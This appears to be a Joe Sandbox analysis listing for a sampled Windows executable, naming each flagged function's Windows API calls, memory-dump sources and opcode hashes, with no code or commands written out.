Opcode ID: 9ee4415ca50324c33a3d5a57874f9cc99ad178eb9645fb895110d63af1d9e2c1
Instruction ID: 2bea14da8b674da9c49dbef22b1ed5c0c248286cb7308c3a07c19cf265eb6bac
Opcode Fuzzy Hash: 9ee4415ca50324c33a3d5a57874f9cc99ad178eb9645fb895110d63af1d9e2c1
Instruction Fuzzy Hash: 47114C32A18B42A7FB049B26EA8437932A0FF44745F404535D65DC2A91EF7DE4B4C751

Function 00007FF6218A9038 Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF6218A908F
GetSystemInfo.KERNEL32 ref: 00007FF6218A90A8
VirtualAlloc.KERNEL32 ref: 00007FF6218A9116
VirtualProtect.KERNEL32 ref: 00007FF6218A9131

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 6131e7ac5c004b666fb02de1823fa69e50ababb2f1d6eff18536aed83fe204ab
Instruction ID: 913ae887dfdaddd35206cbcdffa42e91aa2ae2e8f2ab66928496f9324429e1ff
Opcode Fuzzy Hash: 6131e7ac5c004b666fb02de1823fa69e50ababb2f1d6eff18536aed83fe204ab
Instruction Fuzzy Hash: 89312832B18A819EDB20CF22DC847A923A5FB48B88F944025EA4D87B48DE3CE645C741

Function 00007FF6218CB170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF62183C419), ref: 00007FF6218CB196
FormatMessageA.KERNEL32 ref: 00007FF6218CB1C9

Strings

!x-sys-default-locale, xrefs: 00007FF6218CB189

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: e9313e5009c165bfc27bb14f9f63cf4f23352891cc12b2974ad7925588fd8796
Instruction ID: e39a9b05828b33c2be87a4592a8f4fad10a63941a5d89f296c4b5edaa5ecc0a4
Opcode Fuzzy Hash: e9313e5009c165bfc27bb14f9f63cf4f23352891cc12b2974ad7925588fd8796
Instruction Fuzzy Hash: 8A016D72B1CB8282FB258B12A88476A67A6FB847C5F448136EA49C6A99CE3CD5458701

Function 00007FF621888020 Relevance: 4.7, APIs: 3, Instructions: 248COMMON

Download Yara Rule

APIs

BCryptDecrypt.BCRYPT ref: 00007FF6218881E0

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CryptDecrypt
String ID:
API String ID: 2620231605-0
Opcode ID: d6cabd9d1d5dd1f71ffd53248507088aae8c95ee45a9bdee31098b766f85959d
Instruction ID: 59072dff6f4b499a05c9734b684f089d57f49deb33e9469cc6597029c6aa4de4
Opcode Fuzzy Hash: d6cabd9d1d5dd1f71ffd53248507088aae8c95ee45a9bdee31098b766f85959d
Instruction Fuzzy Hash: 00B17962E0CB859AEB10CB61E8903AD37A1F746788F018236DE4C87B99CF7DD5998301

Function 00007FF6218B90C8 Relevance: 4.7, APIs: 3, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6218A9EEC: GetLastError.KERNEL32 ref: 00007FF6218A9EFB
Part of subcall function 00007FF6218A9EEC: FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
Part of subcall function 00007FF6218A9EEC: SetLastError.KERNEL32 ref: 00007FF6218A9F9B

Part of subcall function 00007FF6218A9EEC: FlsSetValue.KERNEL32 ref: 00007FF6218A9F31

GetLocaleInfoW.KERNEL32 ref: 00007FF6218B9134

Part of subcall function 00007FF62189FBA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62189FBBD

GetLocaleInfoW.KERNEL32 ref: 00007FF6218B917D

Part of subcall function 00007FF62189FBA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62189FC16

GetLocaleInfoW.KERNEL32 ref: 00007FF6218B9245

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
String ID:
API String ID: 1791019856-0
Opcode ID: 8cdfe7f1b5fd9999da327c4f4609675d5690c7bae2d768c40d9912784c01383a
Instruction ID: 27b7201168e04b46e96d7e403bc01840b1222047a1bcdb123f90f401b5345e6b
Opcode Fuzzy Hash: 8cdfe7f1b5fd9999da327c4f4609675d5690c7bae2d768c40d9912784c01383a
Instruction Fuzzy Hash: AB616CB2E0C6428AEF349F15D9902BA73A5FB84744F408135DBAED3691DE7CEA51C702

Function 00007FF621847C20 Relevance: 4.6, APIs: 3, Instructions: 145encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00007FF621847CAD
LocalFree.KERNEL32 ref: 00007FF621847D3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621847E26

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CryptDataFreeLocalUnprotect_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2610421622-0
Opcode ID: e390b9405adc3c2c8e8191afbc4f1639a7c9f4b3bf48e725dcb4c470559bf784
Instruction ID: 0d88c62d873de2edb556a37058978a83c6a2a8757f97c58398978668ac288847
Opcode Fuzzy Hash: e390b9405adc3c2c8e8191afbc4f1639a7c9f4b3bf48e725dcb4c470559bf784
Instruction Fuzzy Hash: 75615D33B18B819AEB10DF74E8803AD73B5EB5978CF004235EA8D96A89DF7CD5948341

Function 00007FF6218AE020 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF6218AE094

Strings

GetLocaleInfoEx, xrefs: 00007FF6218AE03C, 00007FF6218AE04D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 099550578a3a416ea78b7fa52ed638fc0f733537aeae7f3447c0ea0cdfd8c17a
Instruction ID: b8f1dd0ae60bb27011d5aeeb16e7cbe54c8b75a262021625f82d741989f0f199
Opcode Fuzzy Hash: 099550578a3a416ea78b7fa52ed638fc0f733537aeae7f3447c0ea0cdfd8c17a
Instruction Fuzzy Hash: 4F016725B0CA8186EF449B56BC801A6B761FF94BC0F544435EF4DD3799CE3CD5418382

Function 00007FF621887EC0 Relevance: 3.1, APIs: 2, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CryptProtectData.CRYPT32(?,?,?,?,?,?,?,?,1E5E0F68EF71A387,00007FF621887E98), ref: 00007FF621887F18
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,1E5E0F68EF71A387,00007FF621887E98), ref: 00007FF621887FAA

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CryptDataFreeLocalProtect
String ID:
API String ID: 2714945720-0
Opcode ID: a2378fc87af65e51448867ee86bab5adaeca8e4500ced070fe446fae58ae31d0
Instruction ID: a9db4d45d9aa471cd454470ae1318ba8fb0a5f6a80d91dc5a91601fcde161766
Opcode Fuzzy Hash: a2378fc87af65e51448867ee86bab5adaeca8e4500ced070fe446fae58ae31d0
Instruction Fuzzy Hash: 01413932A18B81CAE7208F75D8803AD37A4FB5878CF054235EA8C86E8ADF79D564C744

Function 00007FF6218883C0 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

BCryptCloseAlgorithmProvider.BCRYPT ref: 00007FF6218883D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621888436

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: AlgorithmCloseCryptProvider_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1900905105-0
Opcode ID: b9e6fcf4d0b8c355600597125639a56298eaa31f6bcffd3992446a811c6795d2
Instruction ID: 41fce76cc3d0e04a59c24a3f666e586144d580fc44480121866e68e6f535f93c
Opcode Fuzzy Hash: b9e6fcf4d0b8c355600597125639a56298eaa31f6bcffd3992446a811c6795d2
Instruction Fuzzy Hash: 6601AFA7B08A8982EF189F24E88433D6361FB45F88F944434DA4DC669ADF7DC8848381

Function 00007FF6218B9310 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6218A9EEC: GetLastError.KERNEL32 ref: 00007FF6218A9EFB
Part of subcall function 00007FF6218A9EEC: FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
Part of subcall function 00007FF6218A9EEC: SetLastError.KERNEL32 ref: 00007FF6218A9F9B

Part of subcall function 00007FF6218A9EEC: FlsSetValue.KERNEL32 ref: 00007FF6218A9F31

GetLocaleInfoW.KERNEL32 ref: 00007FF6218B9378

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorLastValue$InfoLocale
String ID:
API String ID: 673564084-0
Opcode ID: d3f265d93177da05e9e3079d3dae9c7822de4fa7ba26229b0f968e85ede82faf
Instruction ID: 8de38c87975cba004235096a9a757d2c57bc37391fb3b21a503693d2aba2ca22
Opcode Fuzzy Hash: d3f265d93177da05e9e3079d3dae9c7822de4fa7ba26229b0f968e85ede82faf
Instruction Fuzzy Hash: 84315272E0D68286EF248F25D8D13AA73A1FB88784F44A135DA5DC3286DF3CE5118701

Function 00007FF6218B8F60 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6218A9EEC: GetLastError.KERNEL32 ref: 00007FF6218A9EFB
Part of subcall function 00007FF6218A9EEC: FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
Part of subcall function 00007FF6218A9EEC: SetLastError.KERNEL32 ref: 00007FF6218A9F9B

EnumSystemLocalesW.KERNEL32 ref: 00007FF6218B8FFE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: b863ec2cec9009a3af30c9a1a615a32510d45c83cc126c9469ae93d30e306958
Instruction ID: f410737cf2163447c56ed97e8f9ee4c99dcf928141ba58744adc50d5974a52e6
Opcode Fuzzy Hash: b863ec2cec9009a3af30c9a1a615a32510d45c83cc126c9469ae93d30e306958
Instruction Fuzzy Hash: 6511DF63E0C6458AEF148F1AD8806AC7BA2FB91BA1F448135D629C33C4DE6CD6D1C741

Function 00007FF6218B9518 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6218A9EEC: GetLastError.KERNEL32 ref: 00007FF6218A9EFB
Part of subcall function 00007FF6218A9EEC: FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
Part of subcall function 00007FF6218A9EEC: SetLastError.KERNEL32 ref: 00007FF6218A9F9B

GetLocaleInfoW.KERNEL32(?,?,?,00007FF6218B92C2), ref: 00007FF6218B954F

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorLast$InfoLocaleValue
String ID:
API String ID: 3796814847-0
Opcode ID: 8a450860209e15821de9f16c01ed0612a725223f9a4b72f88eafb3edea00904a
Instruction ID: ae994a22890d35e94fe35fffd0be01264ed452a570b31771f137d9c6bf4bf7c8
Opcode Fuzzy Hash: 8a450860209e15821de9f16c01ed0612a725223f9a4b72f88eafb3edea00904a
Instruction Fuzzy Hash: 28112772F1C95243EF648F25A8C067E22A0EB44764F544631F66EC36C5DE2DDA818301

Function 00007FF6218B9030 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6218A9EEC: GetLastError.KERNEL32 ref: 00007FF6218A9EFB
Part of subcall function 00007FF6218A9EEC: FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
Part of subcall function 00007FF6218A9EEC: SetLastError.KERNEL32 ref: 00007FF6218A9F9B

EnumSystemLocalesW.KERNEL32 ref: 00007FF6218B90AE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: 0c241287891358d20c5c1590d81d3974ae3e0a48a457f3cbc01ffa927b921278
Instruction ID: 2b59b52f0e60266aebcbfceb035355d83a7934b918c679c48c2604dd958de951
Opcode Fuzzy Hash: 0c241287891358d20c5c1590d81d3974ae3e0a48a457f3cbc01ffa927b921278
Instruction Fuzzy Hash: 0D01D8B2F0C24146EF504F2AE8C07B976D1EB40BA4F459231D669C76D4DF7D9982C702

Function 00007FF621884EC7 Relevance: 1.5, APIs: 1, Instructions: 34comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00007FF621884EFD
CoSetProxyBlanket.OLE32 ref: 00007FF621884F52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188513A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: BlanketCreateInstanceProxy_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2651345351-0
Opcode ID: 57487e17c719c9c5fc1ee3805b57cd3fa781588d0d74c323b56b9f740538bfea
Instruction ID: d095951391aa4fadc82e4961e61e4923b2f03890d190093d9df3ba024d23921d
Opcode Fuzzy Hash: 57487e17c719c9c5fc1ee3805b57cd3fa781588d0d74c323b56b9f740538bfea
Instruction Fuzzy Hash: 0D014F23F09A498BFB22DB65E8413AD63A1AB48758F400536DE4EC3A55DF3CD1558345

Function 00007FF6218ADAE0 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32 ref: 00007FF6218ADB2F

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 17140df511fe09419b9fc83be2d2c34c2fb9fdba42dd4bc62a26aeb66c77a399
Instruction ID: 3df8f5b8800f98fff3fa9bf5d5122ad48fdf9f434a957099693c71f7bfad6ca0
Opcode Fuzzy Hash: 17140df511fe09419b9fc83be2d2c34c2fb9fdba42dd4bc62a26aeb66c77a399
Instruction Fuzzy Hash: CEF01972A0CB4583EB44DB65EC901A96361FB98B88F148035EA5DC3766DE3CD5A1C346

Function 00007FF6218A840C Relevance: 1.5, APIs: 1, Instructions: 28timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6218A8420

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 0313ca540423402b24a5e7d9dd0e4952f66ee95e8b7b4026d8869da447446bf6
Instruction ID: 6d5ab50e8c921d739f78f7015ba325b5e80bd98daf7dd49e351f8fda0d6e37b7
Opcode Fuzzy Hash: 0313ca540423402b24a5e7d9dd0e4952f66ee95e8b7b4026d8869da447446bf6
Instruction Fuzzy Hash: 43F027E1B2D68903EE148755A8503A49281AF5CBF0F00A331FD7D8E7D9EE2CD1508300

Function 00007FF6218B9EEC Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6218B9EF0

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 9736d98ff4c00b43741f239e002f48ba729bdd9c0db5a1f9682fb9dc510a38ab
Instruction ID: 015fc282dd3ba6ec149ca078a738f680b70f36d5a7d677061dbd2d1addad6aff
Opcode Fuzzy Hash: 9736d98ff4c00b43741f239e002f48ba729bdd9c0db5a1f9682fb9dc510a38ab
Instruction Fuzzy Hash: 5FB09224F0BA06C6EF482B516C8221423A47F88700F980138D00CC0320EF2C21A99702

Function 00007FF6218BDF10 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
